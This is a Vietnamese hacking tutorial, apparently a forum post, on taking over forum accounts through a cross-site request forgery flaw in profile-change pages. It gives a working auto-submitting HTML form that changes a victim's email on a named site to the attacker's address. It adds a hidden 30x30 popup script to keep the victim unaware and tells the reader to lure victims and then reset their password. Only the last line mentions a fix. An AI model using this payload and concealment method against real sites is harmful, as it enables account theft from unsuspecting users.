Change thông tin của Victim

trang này đã được đọc lần

Các site bị lỗi :

Các diễn đàn hoặc cái gì đó bắt bạn phải tạo account để đang nhập ( như vậy mình mới đổi thông tin của nó được chứ )
Cách phát hiễn lỗi: bạn đang chơi ở diễn đàn nào đó chẳng hạn, bạn thử vào các phần như thay đổi thông tin , thay đổi mail , thay đổi mật khẫu , nếu như bạn thay đổi được các thông tin trên mà không cần điều kiện gì là chắc chắn nó bị mắc lỗi này rồi, quan trong nhất là đổi được mail , còn nếu đổi được password mà không cần nhập lại pass cũ thì càng tốt
Sẽ dễ dàng thành công hơn nếu victim có bật save cookie.

Cách khai thác thông wa lỗi này :

Bạn có thể thay đổi được các thông tin của victim mà không cần phải biết pass
Để các bạn dễ hiểu Kid sẽ làm 1 ví dụ đơn giản sau đây :

Chúng ta sẽ cùng tham khảo trang http://security.com.vn nha
Umh , bước đầu là phải đang kí , okie, Kid đã đang kí rồi.
Tiếp tục chúng ta phải thử thay đổi thông tin cá nhân , Wao wá tuyệt thay đổi mail và pass dễ dàng, vậy là trang này bị mắc lỗi rồi
Cách khai thác :

Bây giờ chúng tạo 1 file tên là "kid.htm" nha, tên khác cũng được

với code là :

<html>
<body onload="javascript:document.forms[0].submit();">
<FORM action=http://security.com.vn/bug/control.php method=post>
<INPUT type=hidden value=email name=panel>
<INPUT type=hidden value=7 name=forum_id>
<p>
<INPUT size=30 value=kid1608@yahoo.com name=email><br>
</p>

<tr>
<td align="middle" height="1"><font face="verdana, arial, helvetica" size="2">
<input type="submit" value="Submit">

</font></td>
</tr>
</form>
</body>
</html>

vậy là xong ( mail bạn có thể đổi lại cho phù hợp )
1 điều wan trọng là mail bạn dùng trong code không được trùng với mail account đạ đăng kí nha

Bây giờ cái đó đã xài được rồi đó nhưng dễ bị phát hiện lắm, do đó chúng ta sẽ làm thêm 1 bước nữa đễ cho victim không nghi ngờ .

bạn chèn thêm đoạn code này vào trang chủ hoặc là 1 trang nào đó mà bạn sẽ link cho victim


<script language='JavaScript'>
window.open('kid.htm','Popup','width=30,height=30');
</script>

Và công việc của đoạn code trên là mở 1 của sổ và chạy file kid.htm, của sổ này chỉ có kích thước 30x30 --> rất nhỏ và victim sẽ tưởng đó là 1 popup bình thường

Chú ý : Với code trên , bạn cần phải đặt file kid.htm và trang bạn chèn đoạn code trên cùng 1 suddir.

công việc cuối cùng bây giờ là dụ victim vào trang mà bạn mới chèn đoạn code popup thôi. khi đó mail của victim sẽ là kid1608@yahoo.com , vào phần gửi lại mật khẩu là xong ^^

Cách khác phục lỗi này : bạn chỉ cần thêm đoạn code yêu cầu phải nhập lại password khi member muốn đổi lại các thông tin quan trọng như pass, mail,...